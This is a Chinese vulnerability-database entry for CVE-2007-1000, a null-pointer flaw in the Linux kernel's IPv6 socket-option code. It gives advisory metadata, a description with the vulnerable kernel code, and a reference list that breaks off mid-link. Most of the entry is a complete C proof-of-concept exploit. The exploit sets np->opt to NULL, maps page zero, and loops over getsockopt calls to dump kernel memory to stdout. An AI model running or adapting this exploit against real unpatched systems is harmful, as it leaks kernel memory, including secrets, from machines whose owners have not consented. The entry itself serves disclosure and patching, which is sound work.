Linux Kernel ipv6_getsockopt_sticky函数拒绝服务及信息泄露漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113277 漏洞类型 设计错误
发布时间 2007-07-10 更新时间 2007-07-23
CVE编号 CVE-2007-1000 CNNVD-ID CNNVD-200703-332
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/4172
https://www.securityfocus.com/bid/22904
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200703-332
|漏洞详情
Linuxkernel是美国Linux基金会发布的开源操作系统Linux所使用的内核。NFSv4implementation是其中的一个分布式文件系统协议。LinuxKernelIPv6相关的代码实现上存在漏洞,可能导致拒绝服务或内核信息泄露。LinuxKernel的net/ipv6/ipv6_sockglue.c文件中的ipv6_getsockopt_sticky()函数存在空指针引用漏洞,漏洞代码如下:340caseIPV6_2292PKTOPTIONS:341{342structipv6_txoptions*opt=NULL;[1]343structmsghdrmsg;344structflowifl;345intjunk;346347fl.fl6_flowlabel=0;348fl.oif=sk->sk_bound_dev_if;349340if(optlen==0)341gotoupdate;[2]377update:378retv=0;379if(inet_sk(sk)->is_icsk){380if(opt){...389}390opt=xchg(&np->opt,opt);[3]391sk_dst_reset(sk);392}else{393write_lock(&sk->sk_dst_lock);394opt=xchg(&np->opt,opt);[4]395write_unlock(&sk->sk_dst_lock);396sk_dst_reset(sk);397}819caseIPV6_DSTOPTS:820{821822lock_sock(sk);823len=ipv6_getsockopt_sticky(sk,np->opt->hopopt,[5]824optval,len);825release_sock(sk);826returnput_user(len,optlen);827}在do_ipv6_setsockopt()函数中,如果optname=IPV6_2292PKTOPTIONS且optlen=0的话(如[2]所示),np->opt就会被设置为空([3][4]所示)。在do_ipv6_getsockopt()函数中,如果optname=IPV6_DSTOPTS,就会在[5]引用np->opt。攻击者可以利用这个漏洞读取任意内核内存
|漏洞EXP
/*
 * Linux Kernel IPV6_Getsockopt_Sticky Memory Leak  Proof Of Concept
 * dreyer 07-2007
 * Osu, Tatakae, Sexy Pandas!
 *
 *  Dumps to stdout the memory mapped between INI and END.
 *
 * CVE: CVE-2007-1000  BID: 22904
 *
 *  Affected: Linux Kernel < 2.6.20.2
 *
 * http://bugzilla.kernel.org/show_bug.cgi?id=8134
 *
 * Exploitation based on null pointer dereference: http://lists.immunitysec.com/pipermail/dailydave/2007-March/004133.html
 *
 * For free!!! ( worth 600 EUR in zerobay! )
 *
 */


#include <sys/mman.h>
#include <netinet/in.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>

#define HOPOPT_OFFSET 8
#define INIADDR 0xc0100000
#define ENDADDR  0xd0000000
unsigned int i;


int main(int argc, char *argv[]) {
  int s;
  unsigned int optlen;
  void *ptr;
  char value[10240];
  char text[12];

  fprintf(stderr,"Ipv6_getsockopt_sticky vuln POC\n"
                 "dreyer '07 - free feels better\n"
                 "Dumping %p - %p to stdout\n",INIADDR,ENDADDR);

  s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP);
  
  /* Make np->opt = NULL = 0x00000000  through IPV6_2292PKTOPTIONS */
  setsockopt(s, IPPROTO_IPV6, IPV6_2292PKTOPTIONS, (void *)NULL, 0);

  /* Make 0x00000000 address valid */
  ptr = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);

  if (ptr != NULL) {
      perror("mmap");
      exit(-1);
  }

  memset(ptr,0,4096);

  /* Make ptr point to np->opt->hopopt =  (0x00000000)->hopopt = 
   * 0x00000000 + 8 */
  ptr=(char *)((char *)ptr+HOPOPT_OFFSET);

  i=INIADDR;
  while(i<ENDADDR) {
      /* Put in hopopt the address we want to read */
      *((int *)ptr)=i;
      optlen=10240;
      /* Get the chunk pointed by hopopt through getsockopt IPV6_DSTOPTS */
      getsockopt(s, IPPROTO_IPV6, IPV6_DSTOPTS, (void *)value, &optlen);
      if(optlen>0) {
          sprintf(text,"\n%08x:",i);
          write(1,text,strlen(text));
          write(1,value,optlen);
          i=i+optlen;
      } else {
          /* We could not read this portion because of some error, skip it */
          i=i+4;
      }
  }

  return 0;
}

// milw0rm.com [2007-07-10]
|受影响的产品
Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu Linux 6.10 powerpc Ubuntu Ubuntu Linux 6.10 i386 Ubuntu Ubuntu Linux 6.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubu
|参考资料

来源:VU#920689
名称:VU#920689
链接:http://www.kb.cert.org/vuls/id/920689
来源:BID
名称:22904
链接:http://www.securityfocus.com/bid/22904
来源:www.kernel.org
链接:http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.20.2
来源:bugzilla.kernel.org
链接:http://bugzilla.kernel.org/show_bug.cgi?id=8134
来源:issues.rpath.com
链接:https://issues.rpath.com/browse/RPL-1153
来源:MISC
链接:http://www.wslabi.com/wabisabilabi/initPublishedBid.do?
来源:UBUNTU
名称:USN-489-1
链接:http://www.ubuntu.com/usn/usn-489-1
来源:UBUNTU
名称:USN-486-1
链接:http://www.ubuntu.com/usn/usn-486-1
来源:BUGTRAQ
名称:20070615rPSA-2007-0124-1kernelxen
链接:http://www.securityfocus.com/archive/1/471457
来源:REDHAT
名称:RHSA-2007:0169
链接:http://www.redhat.com/support/errata/RHSA-2007-0169.html
来源:OSVDB
名称:33025
链接:http://www.osvdb.org/33025
来源:MANDRIVA
名称:MDKSA-2007:078
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2007:078
来源:VUPEN
名称:ADV-2007-0907
链接:http://www.frsirt.com/english/advisories/2007/0907
来源:SECUNIA
名称:26139
链接:http://secunia.com/advisorie